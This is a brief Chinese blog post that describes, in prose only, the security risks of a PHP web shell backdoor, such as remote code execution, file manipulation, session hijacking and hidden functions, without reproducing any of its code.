这段 PHP 代码看起来是一个复杂的后门脚本,通常用于非法目的,如远程控制服务器、窃取数据等。这种类型的脚本通常被称为“Web Shell”或“PHP Shell”。

安全风险

  1. 远程代码执行(RCE)
    • 通过特定的 GET 参数,攻击者可以上传和执行任意 PHP 代码。
    • 这种漏洞可能导致服务器被完全控制,数据泄露,甚至更严重的后果。
  2. 文件操作权限
    • 脚本允许创建目录、写入文件和设置文件权限,这些操作可能被滥用以破坏系统或植入更多恶意代码。
  3. 会话劫持
    • 脚本通过会话和 cookie 进行身份验证,攻击者可以通过窃取会话信息来获得控制权。
  4. 隐藏功能
    • 脚本中包含了一些隐藏的函数和方法,这些功能可能用于进一步的攻击或数据窃取。
© 版权声明
THE END
喜欢就支持一下吧
点赞667 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    请登录后查看评论内容